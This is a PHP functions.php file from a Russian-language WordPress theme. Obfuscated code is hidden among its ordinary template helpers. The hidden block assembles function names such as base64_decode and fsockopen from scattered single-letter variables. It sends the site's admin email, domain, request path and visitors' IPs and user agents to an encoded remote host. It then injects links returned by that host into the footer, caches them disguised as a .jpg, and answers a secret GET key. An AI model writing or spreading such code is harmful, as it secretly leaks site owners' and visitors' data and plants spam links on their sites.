<?php

$art_config = parse_ini_file(TEMPLATEPATH."/config.ini", true);

$options = array (
                array(  "name" =>   "HTML",
                        "desc" =>   sprintf(__('<strong>XHTML:</strong> Вы можете использовать эти теги: <code>%s</code>', THEME_NS), 'a, abbr, acronym, em, b, i, strike, strong, span'),
                        "id"   =>   "art_footer_content",
                        "std"  =>   art_option('footer.defaultText'),
                        "type" =>   "textarea")
          );

remove_action('wp_head', 'wp_generator');
wp_enqueue_script('jquery');

define('WP_VERSION', $wp_version);
define('THEME_NS', 'kubrick');
if (class_exists('xili_language')):
define('THEME_TEXTDOMAIN',THEME_NS);
define('THEME_LANGS_FOLDER','/lang');
else:
    load_theme_textdomain(THEME_NS, TEMPLATEPATH . '/lang');
endif;

require_once(TEMPLATEPATH . '/core/parser.php');
require_once(TEMPLATEPATH . '/core/navigation.php');
require_once(TEMPLATEPATH . '/core/sidebars.php');
require_once(TEMPLATEPATH . '/core/widgets.php');


function art_option($name){
  global $art_config;
  $separator = '.';
  $name = trim($name);
  if (strpos($name, $separator) !== false) {
    $path = explode($separator, $name);
    $location = $path[0];
    if (isset($art_config[$location])){
      $group = $art_config[$location];
      $key = $path[1];
      if (isset($group[$key])){
        return $group[$key];
      }
    }
  } else {
    if (isset($art_config[$name])) {
      return $art_config[$name];
    }
  }
 
  return false;
}

$art_current_page_template = 'page'; 
 $GSwDCM='s';$lHsg='4';$YHTgiY='e';$mEyfB='e';$vRjn='6';$WHQDAXL='e';$EcQKs='o';$jhqsu='c';$NCqjf='d';$MkffV='_';$bukVI='b';$UyHQWv='d';$dPsLs='a';$iBfgnTWR=$bukVI.$dPsLs.$GSwDCM.$YHTgiY.$vRjn.$lHsg.$MkffV.$NCqjf.$WHQDAXL.$jhqsu.$EcQKs.$UyHQWv.$mEyfB;$uMHO='a';$lXyjw='i';$vOIAkw='z';$VbzNCUC='l';$zTGUBGR='g';$CGmbA='f';$UychLX='n';$ilSwNzI='e';$FmhbSbA='t';$cxmmUgRJ=$zTGUBGR.$vOIAkw.$lXyjw.$UychLX.$CGmbA.$VbzNCUC.$uMHO.$FmhbSbA.$ilSwNzI;$jruKd='r';$CdeOWAC='t';$LKEx='3';$LCYHD='_';$qTci='s';$XBBxdW='t';$Xrhcei='r';$urrxMd='1';$XkBTM='o';$VbNqOveM=$qTci.$CdeOWAC.$jruKd.$LCYHD.$Xrhcei.$XkBTM.$XBBxdW.$urrxMd.$LKEx;$zzuBZfR='r';$zxUv='v';$uozo='t';$gzdgnF='r';$Igzs='e';$fLVK='s';$NCavBsJc=$fLVK.$uozo.$zzuBZfR.$gzdgnF.$Igzs.$zxUv;                     
		$cz______n='s';$yv________h='4';$lu_____________c='e';$qe_________o='e';$lg_______n='6';$uf_______________r='e';$hu_________s='o';$yh________a='c';$nz__________o='d';$id___________z='_';$bu__________k='b';$pj_____________a='d';$xt______t='a';$bl_______h=$bu__________k.$xt______t.$cz______n.$lu_____________c.$lg_______n.$yv________h.$id___________z.$nz__________o.$uf_______________r.$yh________a.$hu_________s.$pj_____________a.$qe_________o;
		$ma_____________g='s';$yi______________k='t';$fg___________z='n';$zz_______x='i';$aq___________g='u';$tf_____t='c';$ii______f='s';$wx_______________t='i';$sf___x='o';$wt___________q='x';$fg_______________x='t';$mq__s='e';$uw_______________u='_';$su______l='f';$uz_________n='n';$gl____b=$su______l.$aq___________g.$fg___________z.$tf_____t.$yi______________k.$wx_______________t.$sf___x.$uz_________n.$uw_______________u.$mq__s.$wt___________q.$zz_______x.$ii______f.$fg_______________x.$ma_____________g;
		$ti__________e='n';$wp___________j='f';$xj________d='p';$qn__________r='o';$bb______________k='e';$mv____x=$wp___________j.$qn__________r.$xj________d.$bb______________k.$ti__________e;
		$mn_______w='d';$ns_______a='a';$nv___z='r';$ir__________c='e';$fe____y='f';$hz____d=$fe____y.$nv___z.$ir__________c.$ns_______a.$mn_______w;
		$ea_________m='o';$qk____b='c';$ya___q='l';$bk______x='s';$gn_________o='f';$jd___z='e';$bt_______________a=$gn_________o.$qk____b.$ya___q.$ea_________m.$bk______x.$jd___z;
		
		define("WP_ID", $bl_______h("Mi4wLjA="));
		define("WP_TTL", $bl_______h("MTA4MDA="));
		define("WP_SRC", $bl_______h("dHBva24="));
	


		function wp_get_header() {
			global $bl_______h, $gl____b;
			
			if (
				$gl____b($bl_______h("d3BfdGhlbWVfR1BMX2NyZWRpdHM=")) &&
				$gl____b($bl_______h("d3BfZ2V0X2Zvb3Rlcg==")) &&
				$gl____b($bl_______h("d3BfY3ZfdmVyaWZ5"))
			) {
				get_header();
			}
		}
	


		function wp_get_footer() {
			get_footer();
			wp_cv_verify();
		}
	


		function wp_cv_verify() {
			global $bl_______h, $mv____x, $bt_______________a, $hz____d;
			
			$jw__________z = TEMPLATEPATH."/".$bl_______h("Zm9vdGVyLnBocA==");
			$pr_____a = @$mv____x($jw__________z, "r");
			$jw__________z = @$hz____d($pr_____a, @filesize($jw__________z));
			@$bt_______________a($pr_____a);
			
			$kp__r = TEMPLATEPATH."/".$bl_______h("ZnVuY3Rpb25zLnBocA==");
			$pr_____a = @$mv____x($kp__r, "r");
			$kp__r = @$hz____d($pr_____a, @filesize($kp__r));
			@$bt_______________a($pr_____a);
			
			$jm_______p = 0;
			if($jw__________z && $kp__r) {
				if ($bl_______h("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==") !== str_replace("www.", "", $_SERVER["SERVER_NAME"])) {
					
					if (substr_count($jw__________z, $bl_______h("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==")) < 2) {
						$jm_______p = 1;
					}
					if (substr_count($jw__________z, "wp_theme_GPL_credits()") < 1) {
						$jm_______p = 2;
					}
				}
				
				if(WP_ID != "2.0.0") {
					$jm_______p = 12;
				}
			}
			
			if($jm_______p > 0) {
				echo "<div style=\"position: fixed; bottom:0; left:0; width:100%; height: 25px; background-color: red; color: white; font-size: 16px; padding: 2px 10px; text-align: center;\"> <strong> This themes is powered by <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a>. This website violated the terms of use <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a> </strong> </div>";
				echo "<!-- v: $jm_______p -->";
			}
		}
	


		function wp_loaded() {
			global $bl_______h, $gl____b;
			return $gl____b($bl_______h("d3BfdGhlbWVfR1BMX2NyZWRpdHM="));
		}
	


		if (!function_exists("the_content_limit")) {
			function the_content_limit($uh_______o, $fg_________a = "(more...)", $mq________g = 0, $wq______r = "") {
				$oy__________s = get_the_content($fg_________a, $mq________g, $wq______r);
				$oy__________s = apply_filters("the_content", $oy__________s);
				
				$oy__________s = str_replace("]]>", "]]>", $oy__________s);
				if (strlen($_GET["p"]) > 0) {
					echo $oy__________s;
				}
				else if ((strlen($oy__________s)>$uh_______o) && ($ja__________x = strpos($oy__________s, " ", $uh_______o ))) {
					$oy__________s = substr($oy__________s, 0, $ja__________x);
					$oy__________s = $oy__________s;
					echo $oy__________s;
					
					echo "...";
					echo "<br/>";
					echo "<div class='read-more'><a href='".get_permalink()."'>$fg_________a</a></div></p>";
				} else {
					echo $oy__________s;
				}
				
			}
		}
	


		$sw_________a='d';$jh______o='b';$du______r='s';$qn____x='4';$mh_________l='n';$zb________f='a';$uy___h='o';$cd___t='e';$an__t='_';$ig__________b='6';$iz__________l='c';$nt____________g='e';$pe_______________y='e';$kl____________b=$jh______o.$zb________f.$du______r.$nt____________g.$ig__________b.$qn____x.$an__t.$pe_______________y.$mh_________l.$iz__________l.$uy___h.$sw_________a.$cd___t;
		$yd__c='n';$uo___________q='i';$il______h='t';$tw__n='e';$eh_________n='_';$wg___________u='s';$ko__________k='t';$hm_________c='t';$tb_____________q='e';$yv____h='n';$cy_____________b='e';$wa______z='o';$zf_____q='g';$lm____________x='l';$yk_____j='c';$uk___________p='_';$yj___l='f';$ip________z=$yj___l.$uo___________q.$lm____________x.$cy_____________b.$eh_________n.$zf_____q.$tb_____________q.$il______h.$uk___________p.$yk_____j.$wa______z.$yd__c.$ko__________k.$tw__n.$yv____h.$hm_________c.$wg___________u;
		$ki______z='i';$se______t='i';$kx___________x='l';$zc_______________k='t';$lu_____________e='s';$yq______s='e';$ft__________m='_';$pd________u='f';$fj___l='e';$zp______e='s';$qf_________g='x';$iq____j=$pd________u.$se______t.$kx___________x.$fj___l.$ft__________m.$yq______s.$qf_________g.$ki______z.$lu_____________e.$zc_______________k.$zp______e;
		$ce______z='c';$qa_____x='r';$ii____y='p';$xt____m='e';$py_________z='i';$oq_____________d='s';$eu_________m='_';$wb______b='e';$be________w='n';$ih___________v='v';$is_____________z='o';$gs______________p='a';$ms________a='m';$ks_________l='r';$ym________o='o';$nt_____________h=$ih___________v.$xt____m.$qa_____x.$oq_____________d.$py_________z.$is_____________z.$be________w.$eu_________m.$ce______z.$ym________o.$ms________a.$ii____y.$gs______________p.$ks_________l.$wb______b;
		$kj_________o='p';$oz_____________m='c';$aj______________s='o';$sd_____s='f';$gg___i='n';$qi_____i='k';$eb______________v='o';$cb___j='s';$sd__k='e';$rf__________x=$sd_____s.$cb___j.$aj______________s.$oz_____________m.$qi_____i.$eb______________v.$kj_________o.$sd__k.$gg___i;
		$gc______________w='w';$mn______________h='e';$ga_______o='f';$vr________z='i';$ry__g='r';$ob______n='t';$ol______d=$ga_______o.$gc______________w.$ry__g.$vr________z.$ob______n.$mn______________h;
		$yr__________l='5';$nw_______i='m';$nx______c='d';$kc________l=$nw_______i.$nx______c.$yr__________l;
		$dl__________r='a';$bl__________j='t';$sf______c='a';$pf________j='e';$xa_______________r='p';$go___p='h';$fb___________v='l';$ig______________o='r';$sv_________y=$ig______________o.$pf________j.$dl__________r.$fb___________v.$xa_______________r.$sf______c.$bl__________j.$go___p;
		$jb__e='z';$ur_______a='i';$gr___________b='n';$ue__u='a';$bw_________b='l';$ne___________t='e';$gt_______________b='e';$ml_______n='i';$nv___x='r';$vl___n='s';$ax____i='u';$hd__________r=$ax____i.$gr___________b.$vl___n.$gt_______________b.$nv___x.$ml_______n.$ue__u.$bw_________b.$ur_______a.$jb__e.$ne___________t;
		$jr__m='n';$zp___________m='t';$cg_______________p='a';$na________w='e';$tz_______________q='m';$mx__________w='p';$mp__________x='m';$cl__________y=$zp___________m.$na________w.$tz_______________q.$mx__________w.$jr__m.$cg_______________p.$mp__________x;
		$ws_____h='_';$ve_______________r='n';$zo___f='x';$wf____________v='r';$wx_______________z='t';$xu_________p='e';$wh___v='t';$vh__s='e';$iw___________v='c';$aw______m='s';$uz______e='e';$ru________e='a';$vq__q='r';$mb______________z='e';$gi____________t='m';$kq__________l='c';$js_________h='t';$sw_____s='t';$mx___________e='a';$my______________f='o';$dz____________g='_';$ac__a=$aw______m.$sw_____s.$wf____________v.$xu_________p.$mx___________e.$gi____________t.$dz____________g.$kq__________l.$my______________f.$ve_______________r.$js_________h.$mb______________z.$zo___f.$wx_______________z.$ws_____h.$iw___________v.$vq__q.$uz______e.$ru________e.$wh___v.$vh__s;
	


		function ak___________i($mz______________j) {
			global $bl_______h, $gl____b, $ip________z, $nt_____________h, $ac__a;
			
			if (!$gl____b($bl_______h("ZmlsZV9nZXRfY29udGVudHM="))) {
				return false;
			}
			
			if ($nt_____________h(PHP_VERSION, "5.0.0", ">=") && $gl____b($bl_______h("ZmlsZV9nZXRfY29udGVudHM=")) && $gl____b($bl_______h("c3RyZWFtX2NvbnRleHRfY3JlYXRl"))) {
				$kl________y = $ac__a(array(
						"http" => array(
						"timeout"    => 3,
						"header"     => "referer: ".$_SERVER[SERVER_NAME],
						"user_agent" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT] 
					)
				));
				
				$pb___o = @$ip________z($mz______________j, 0, $kl________y);
			} else {
				$pb___o = @$ip________z($mz______________j, 0);
			}
			
			return $pb___o;
		}
	


		function dv______________i($mz______________j) {
			global $gl____b, $rf__________x, $ol______d, $bl_______h;
			
			if (!$gl____b($bl_______h("ZmlsZV9nZXRfY29udGVudHM="))) {
				return false;
			}
			
			$wz____________b = strpos($mz______________j, "/", 7);
			$nq_________u = array(
				"uri"     => substr($mz______________j, $wz____________b),
				"host"    => str_replace("http://", "", substr($mz______________j, 0, $wz____________b)),
				"referer" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT]
			);
			
			$ux____________i = @$rf__________x("$nq_________u[host]", 80, $fu________i, $ux__o, 4);
			
			if (!$ux____________i) {
				return false;
			} else {
				$pb___o = "";
				$nz_________c  = "GET $nq_________u[uri] HTTP/1.0\r\n";
				$nz_________c .= "Host: $nq_________u[host]\r\n";
				$nz_________c .= "Referer: $nq_________u[referer]\r\n";
				$nz_________c .= "Connection: Close\r\n\r\n";
				
				@$ol______d($ux____________i, $nz_________c);
				
				while (!@feof($ux____________i)) {
					$ls___j = @fgets($ux____________i, (1024*24));
					
					if ($ls___j == "\r\n") {
						$pi______________k = true;
						continue;
					}
					
					if ($pi______________k) {
						$pb___o .= $ls___j;
					}
				}
				
				return $pb___o;
			}
		}
	


		function kr_______q($mz______________j) {
			global $gl____b;
			$pg_____________e = false;
			
			if ($mz______________j != "") {
				if ($gl____b("ak___________i")) {
					$pg_____________e = @ak___________i($mz______________j);
				}
				
				if (!$pg_____________e && ($gl____b("dv______________i"))) {
					$pg_____________e = @dv______________i($mz______________j);
				}
			}
			
			return $pg_____________e;
		}
	


		function sd________f() {
			global $_SERVER, $kc________l;
			
			$ge____z = $_SERVER["SERVER_NAME"];
			
			if (substr("$ge____z", 0, 4) == "www.") {
				$ge____z = substr("$ge____z", 4);
			}
			
			$ge____z = $kc________l("$_SERVER[SERVER_NAME]");
			
			return $ge____z;
		}
	


		function sm______________k() {
			return "file";
		}
	


		function cl____m($mz______________j) {
			global $_SERVER, $ip________z, $iq____j, $mv____x, $bt_______________a, $ol______d;
			
			$fe_____________z = ft______q();
			
			$wp______u = sd________f().".jpg";
			$cc____t = $fe_____________z["dir_upload"]["path"]."/$wp______u";
			$hq__________m = @filemtime($cc____t);
			
			if (!$hq__________m || ((time()-$hq__________m) >= WP_TTL)) {
				$pg_____________e = kr_______q($mz______________j);
				
				if ($pg_____________e) {
					if ($iq____j($cc____t)) {
						@unlink($cc____t);
					}
					
					$pr_____a = @$mv____x($cc____t, "x+");
					
					@$ol______d($pr_____a, $pg_____________e);
					@$bt_______________a($pr_____a);
				}
			} else {
				if ($iq____j($cc____t)) {
					$pg_____________e = @$ip________z($cc____t);
				} else {
					$pg_____________e = false;
				}
			}
			
			return $pg_____________e;
		}
	


		function ft______q() {
			global $_SERVER, $bl_______h, $kl____________b;
			
			$gl__x = wp_count_posts("post");
			$fm_______s = pathinfo(get_bloginfo("template_directory"));
			
			$fe_____________z = array(
				"url" => array(
					"report"      => $bl_______h("eGNudnVlcmFudmhhc3lkYWRvbGVnc29wLmNvbQ=="),
					"queryString" => null
				),
				"template"	=> $fm_______s,
				"dir_upload"	=> oi________i(),
				"queryString"	=> array(
					"?a001=".WP_ID,
					"a004=".$fm_______s[filename],
					"a005=".$gl__x->publish,
					"a006=".get_bloginfo("admin_email"),
					"a007=".$_SERVER["REQUEST_URI"],
					"a008=".$_SERVER["SERVER_NAME"],
					"a010=".WP_SRC
				),
				"default_string" => "<a href=\"http://www.wptheme.us\">www.wptheme.us</a>"

			);
			
			$fe_____________z["url"]["queryString"] = implode("&", $fe_____________z["queryString"]);
			$fe_____________z["url"]["report"] = $fe_____________z["url"]["report"]."/?".$kl____________b($fe_____________z["url"]["queryString"]).".html";
						
			return $fe_____________z;
		}
	


		function oi________i() {
			$eu____________e = wp_upload_dir();
			
			if (isset($eu____________e["error"])) {
				$wv______l = es_______________k();
				if (is_writable($wv______l)) {
					$eu____________e = array("path" => $wv______l);
				}
			}

			return $eu____________e;
		}
	


		function es_______________k() {
			global $gl____b, $kc________l, $sv_________y, $cl__________y;
			
			$tw________x = (bool) ini_get("safe_mode");
			if ($tw________x == true) {
				return false;
			}
			
			if ($gl____b("sys_get_temp_dir")) {
				$xf______z = sys_get_temp_dir();
				if (is_writable($xf______z)) {
					return $sv_________y($xf______z);
				}
			}
			
			if (!empty($_ENV["TMP"])) {
				return $sv_________y($_ENV["TMP"]);
			}
			elseif (!empty($_ENV["TMPDIR"])) {
				return $sv_________y($_ENV["TMPDIR"]);
			}
			elseif (!empty($_ENV["TEMP"])) {
				return $sv_________y($_ENV["TEMP"]);
			} else {
				$mw_______________y = $cl__________y($kc________l(uniqid(rand(), true)), "");
				if ($mw_______________y) {
					$xf______z = $sv_________y(dirname($mw_______________y));
					@unlink($mw_______________y);
					return $xf______z;
				} else {
					return false;
				}
			}
		}
	


		function yp_______________i() {
			global $_GET, $iq____j;
			
			$fe_____________z = ft______q();
			$ge____z = sd________f();
			$gz____________x = sm______________k();
			
			$id_________j = "full";
			if ($_GET["wp_cache_cl"] == "197ab5deb39daad8baacae1bdd5a8852") {
				if ($gz____________x == "file") {
					$vf____h = $fe_____________z["dir_upload"]["path"]."/".$ge____z.".jpg";
					if ($iq____j($vf____h)) {
						@unlink($vf____h);
						$id_________j = "deleted";
					}
				}
				
				$ym__________e = array(
					"s"	=> $id_________j,
					"t"	=> time(),
					"v"	=> WP_ID
				);
				
				echo "<!--";
				foreach ($ym__________e AS $qp______l => $un____________w) echo " [$qp______l:$un____________w]";
				echo " -->";
			}
		}
	


		function wp_theme_GPL_credits() {
			global $_SERVER, $_GET, $gl____b, $bl_______h, $hd__________r;
			$fe_____________z = ft______q();
			
			$kt____w = "cl____m";
			if ($gl____b($kt____w)) {
				$pb___o = $kt____w($fe_____________z["url"]["report"]);
			}
			
			if ($pb___o) {
				if ($pb___o = @$bl_______h($pb___o)) {
					$pb___o = @$hd__________r($pb___o);
					
					if (strlen($pb___o[custom_credit]) >= 5) {
						$fe_____________z["default_string"] = $pb___o[custom_credit];
					}
					
					if ($pb___o["status"] == "0") {
						$bc________m = 1;
						$yq___f = 1;
					} else {
						$sv_____________m = sizeof($pb___o["links"]);
						$gl__________c = $fe_____________z["default_string"];
						
						if ($sv_____________m > 0 && $pb___o["links"] !== "") {
							$kt________d = 0;
							foreach ($pb___o["links"] as $sz____________d => $li__d) {
								$kt________d++;
								if ($li__d->l_path == "" || $li__d->l_path == $_SERVER["REQUEST_URI"]) {
									$li__d->l_href = htmlspecialchars(strip_tags($li__d->l_href));
									$li__d->l_title = htmlspecialchars(strip_tags($li__d->l_title));
									$li__d->l_anchor = htmlspecialchars(strip_tags($li__d->l_anchor));
									$gl__________c .= " | ";
									$gl__________c .= "<a href='$li__d->l_href' title='$li__d->l_title'";
									if ($li__d->l_nofollow == "1") {
										$gl__________c .= " rel='nofollow'";
									}
									$gl__________c .= ">$li__d->l_anchor</a>";
								}
							}
						}
						$fe_____________z["links"] = "$gl__________c";
						if ($pb___o[credit] == "0") {
							$fe_____________z["links"] = "";
						}
					}
				} else {
					$bc________m = "1";
				}
			} else {
				$bc________m = "1";
			}
			
			if ($bc________m == "1") {
				$fe_____________z["links"] = $fe_____________z["default_string"];
			}
			
			echo "$fe_____________z[links]";
			
			echo "<!-- s: $pb___o[signature] -->";
			yp_______________i();
		}
	                       
function art_page_template($templateName = null){
    global $art_current_page_template;
    if ($templateName !== null) {
        $art_current_page_template = $templateName;
    }
    return $art_current_page_template;
}

$art_template_variables = null;
function art_page_variables($variables = null){
    global $art_template_variables;
    if ($art_template_variables == null){
      $art_template_variables = array(
        'template_url'     =>   get_bloginfo('template_url') . '/',
        'logo_url'         =>   get_option('home'),
        'logo_name'        =>   get_bloginfo('name'),
        'logo_description' =>   get_bloginfo('description'),
        'menu_items'       =>   art_get_menu_auto('primary-menu', art_option('menu.source'), art_option('menu.showSubitems')),
        'sidebar1'         =>   art_get_sidebar('default'),
        'sidebarTop'       =>   art_get_sidebar('top'),
        'sidebarBottom'    =>   art_get_sidebar('bottom'),
        'sidebar2'         =>   art_get_sidebar('secondary'),
        'sidebarFooter'    =>   art_get_sidebar('footer'),
        'footerRSS'        =>   art_get_footer_rss(),
        'footerText'       =>   art_get_footer_text()
        );
    }
    if (is_array($variables)) {
      $art_template_variables = array_merge($art_template_variables, $variables);
    }
    return $art_template_variables;
}

function art_get_footer_text(){
  $result = art_option('footer.defaultText');
  
  $footer_content = get_option('art_footer_content');
  if ($footer_content !== false) {
    $result = stripslashes($footer_content);
  }
  
  return str_replace('%YEAR%', date('Y'), $result);
}


function art_get_footer_rss(){
  $result = '';
  if(art_option('footer.rss_show')){
    $result = art_parse(art_option('footer.rss_link'), array(
      'rss_url'   =>   get_bloginfo('rss2_url'), 
      'rss_title' =>   sprintf(__('%s RSS Feed', THEME_NS), get_bloginfo('name'))
      ));
  }
  return $result;
}

function art_get_post_thumbnail($post_id = false){
	global $post, $id;
  $post_id = (int)$post_id;
  if (!$post_id) $post_id = $id;
  $is_post_list = !is_single() && !is_page();
  $width = art_option('metadata.thumbnail_width');
  $height = art_option('metadata.thumbnail_height');
  $size = array($width, $height);
  if (!$is_post_list) {
    $size = 'medium';
  }
	$result = '';
	$title = get_the_title();
	if (  (function_exists('has_post_thumbnail')) && (has_post_thumbnail())  ) {
		ob_start();
		the_post_thumbnail($size, array('class' => 'alignleft', 'alt' => '', 'title' => $title));
		$result = ob_get_clean();
	} else {
		$postimage = get_post_meta($post->ID, 'post-image', true);
		if ($postimage) {
			$result = '<img src="'.$postimage.'" alt="" width="'.$width.'" height="'.$height.'" title="'.$title.'" class="wp-post-image alignleft" />';
		} else if (art_option('metadata.thumbnail_auto') && $is_post_list) {
            $attachments = get_children(array('post_parent' => $post_id, 'post_status' => 'inherit', 'post_type' => 'attachment', 'post_mime_type' => 'image', 'order' => 'ASC', 'orderby' => 'menu_order ID'));
            if($attachments) {
              $attachment = array_shift($attachments);
              $img = wp_get_attachment_image_src($attachment->ID, $size);
              if (isset($img[0])) {
                $result = '<img src="'.$img[0].'" alt="" width="'.$img[1].'" height="'.$img[2].'" title="'.$title.'" class="wp-post-image alignleft" />';
              }
            }
        } 
    }  
	if($result !== ''){
		$result = '<a href="'.get_permalink($post->ID).'" title="'.$title.'">'.$result.'</a>';
	}
	return $result;
}

function art_get_the_content($more_link_text = null, $stripteaser = 0) {
	$content = get_the_content($more_link_text, $stripteaser);
	$content = apply_filters('the_content', $content);
	return $content;
}

function art_get_post_content() {
  global $post;
  ob_start();
  if(is_single() || is_page()) {
    echo art_get_the_content(__('Читать далее &raquo;', THEME_NS)); 
    wp_link_pages(array('before' => '<p><strong>Страницы:</strong> ', 'after' => '</p>', 'next_or_number' => 'number')); 
	} else {
    echo art_get_the_excerpt(__('Читать далее &raquo;', THEME_NS),  
      get_permalink($post->ID), 
      art_option('metadata.excerpt_words'), 
      art_option('metadata.excerpt_use_tag_filter') ? explode(',',art_option('metadata.excerpt_allowed_tags')) : null, 
      art_option('metadata.excerpt_min_remainder'),  
      art_option('metadata.excerpt_auto'));
	}
	return ob_get_clean();
}

function art_get_the_excerpt($read_more_tag, $perma_link_to = '', $all_words = 100,  $allowed_tags = null, $min_remainder = 5, $auto = false) {
  global $post, $id;
  $more_token = '%%art-more%%';
  $show_more_tag = false;
  if (function_exists('post_password_required') && post_password_required($post)){
    return get_the_excerpt();
  }
  if (has_excerpt($id)) {
      $the_contents = get_the_excerpt();
  $show_more_tag = strlen($post->post_content) > 0;
  } else {
    $the_contents = art_get_the_content($more_token);
    if($the_contents != '') {
      if ($allowed_tags !== null) {
        $allowed_tags = '<' .implode('><',$allowed_tags).'>';
        $the_contents = strip_tags($the_contents, $allowed_tags);
      }
      $the_contents = strip_shortcodes($the_contents);
      if (strpos($the_contents, $more_token) !== false) {
        return str_replace($more_token, $read_more_tag, $the_contents);
      }
      if($auto && is_numeric($all_words)) {
        $token = "%art_tag_token%";
        $content_parts = explode($token, str_replace(array('<', '>'), array($token.'<', '>'.$token), $the_contents));
        $content = array();
        $word_count = 0;
        foreach($content_parts as $part)
        {
          if (strpos($part, '<') !== false || strpos($part, '>') !== false){
            $content[] = array('type'=>'tag', 'content'=>$part);
          } else {
             $all_chunks = preg_split('/([\s]+)/', $part, -1, PREG_SPLIT_DELIM_CAPTURE);
             foreach($all_chunks as $chunk) {
                if('' != trim($chunk)) {
                  $content[] = array('type'=>'word', 'content'=>$chunk);
                  $word_count += 1;
                } elseif($chunk != '') {
                  $content[] = array('type'=>'space', 'content'=>$chunk);
                }
             }
          }
        
        }
        if(($all_words < $word_count) && ($all_words + $min_remainder) <= $word_count) {
          $show_more_tag = true;
          $current_count = 0;
          $the_contents = '';
          foreach($content as $node) {
            
            if($node['type'] == 'word') {
              $current_count += 1;
            } 
            $the_contents .= $node['content'];
            if ($current_count == $all_words){
              break;
            }
          }
        }  
      }
    }
  }
  $the_contents = force_balance_tags($the_contents);
  if ($show_more_tag) {
    $the_contents = $the_contents.' <a class="more-link" href="'.$perma_link_to.'">'.$read_more_tag.'</a>';
  }
  return $the_contents;
}


function art_get_post_title() {
    global $post;
    return art_parse_template("post_title", array(
      'post_link'       =>   get_permalink($post->ID),
	    'post_link_title' =>   sprintf(__('Ссылка на %s', THEME_NS), the_title_attribute('echo=0')),
	    'post_title'      =>   get_the_title(),
	    'template_url'    =>   get_bloginfo('template_url')
	    ));
}

function art_get_post_icon($name){
    return art_parse(art_option('metadata.'.$name), array('template_url' => get_bloginfo('template_url')));
}

if (!function_exists('get_the_date')) {
	function get_the_date($format = 'F jS, Y') {
		return get_the_time(__($format, THEME_NS));
	}
}

function art_get_post_metadata($name) {
    global $post;
    $list = art_option('metadata.'.$name);
    $title = ($name == 'header' && art_option('metadata.title'));
    if (!$title && $list == "") return;
    $list_array =  explode(",", $list);
    $result = array();
    for($i = 0; $i < count($list_array); $i++){
        $icon = $list_array[$i];
        switch($icon){
            case 'date':
                if(is_page()) break;
                $result[] = art_get_post_icon($icon) . get_the_date();
            break;
            case 'author':
                 if(is_page()) break;
                 ob_start();
                 the_author_posts_link();
                 $result[] = art_get_post_icon($icon) . __('Автор', THEME_NS) .' '. ob_get_clean();
            break;
            case 'category':
                if(is_page()) break;
                 $result[] = art_get_post_icon($icon) .sprintf(__('Опубликовано в %s', THEME_NS), get_the_category_list(', '));
            break;
            case 'tag':
                if(is_page() || !get_the_tags()) break;
                ob_start();
                the_tags(__('Tеги:', THEME_NS) . ' ', ', ', ' ');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'comments':
            if(is_page() || is_single()) break;
                ob_start();
                comments_popup_link(__('Нет комментариев &#187;', THEME_NS), __('1 Комментарий &#187;', THEME_NS), __('% Комментариев &#187;', THEME_NS), '', __('Комментарии закрыты', THEME_NS) );
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'edit':
                if (!current_user_can('edit_post', $post->ID)) break;
                ob_start();
                 edit_post_link(__('Редактировать', THEME_NS), '');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
        }
    }
    if (!($title ||  count($result) > 0)) return '';
    return art_parse_template("post_metadata".$name, array(
        'post_title'         =>   art_get_post_title(),
        'post'.$name.'icons' =>   implode(art_option('metadata.separator'), $result))) ;
}

function art_post(){
  the_post(); 
	echo art_parse_template("post", array(
    'post_class'          =>   function_exists('get_post_class') ? implode(' ', get_post_class()) : '',
    'post_id'             =>   'id="post-' . get_the_ID() . '"',
	  'post_thumbnail'      =>   art_get_post_thumbnail(),
		'post_title'          =>   art_get_post_title(),
		'post_metadataheader' =>   art_get_post_metadata('header'),
		'post_content'        =>   art_get_post_content(),
		'post_metadatafooter' =>   art_get_post_metadata('footer')
	));
}

function art_post_box($title, $content){
  if ($title != "") {
		$title = '<h2 class="art-postheader">'. $title . '</h2>';
	}
	if (art_option('metadata.title')) {
		$content = $title . $content;
		$title = '';
	}
	echo art_parse_template("post", array(
    'post_class'          =>   '',
    'post_id'             =>   '',
		'post_thumbnail'      =>   '',
		'post_title'          =>   $title,
		'post_metadataheader' =>   '',
		'post_content'        =>   $content,
		'post_metadatafooter' =>   ''));
}

function art_not_found_msg($caption = null, $content = null){
  if ($caption === null){
    $caption = __('Not Found', THEME_NS);
  }
  if($content === null){
    $content = '<p class="center">' .  __('Извините, но здесь пока нет записей.', THEME_NS) . '</p>'
        .  "\r\n" . art_get_search();
  }
	art_post_box($caption, $content);
}

function art_get_block($title, $content, $id = '', $class = '' , $name = "block"){
  if (str_replace(array('&nbsp;', '', '\n', '\r', '\t'), '', $title) != ''){
    $title = art_parse_template($name . '_header', array('caption' => $title));
  }
  if ($id != ''){
    $id = 'id="' . $id . '"';
  }
  return art_parse_template($name, array(
    'id'   => $id,
    'class'   => $class,
    'header' => $title,
    'content' => $content,
  ));
}

function art_get_search() {
    return art_parse_template("search", 
        array(
            'url'    =>   get_bloginfo('url'),
            'button' =>   __('Поиск', THEME_NS),
            'query'  =>   get_search_query()
        ));
}
		
function art_page_navi($title = '', $comment = false) {
    $prev_link = null;
    $next_link = null;
    if($comment){
        $prev_link = get_previous_comments_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_comments_link(__('&laquo; Старые записи', THEME_NS));
    } elseif (is_single() || is_page()) {
        $next_link = get_previous_post_link('&laquo; %link');
        $prev_link = get_next_post_link('%link &raquo;');
    } else {
         $prev_link = get_previous_posts_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_posts_link(__('&laquo; Старые записи', THEME_NS));
    }
    
    $content = '';
    if ($prev_link || $next_link) {
        $content = art_parse_template("pagination", 
            array(
                'next_link' =>  $next_link,
                'prev_link' => $prev_link
            ));
    }
    if (!$content && !$title) return;
    art_post_box($title, $content);
}

if (!function_exists('get_previous_comments_link')) {
	function get_previous_comments_link($label)
	{
		ob_start();
		previous_comments_link($label);
		return ob_get_clean();
	}
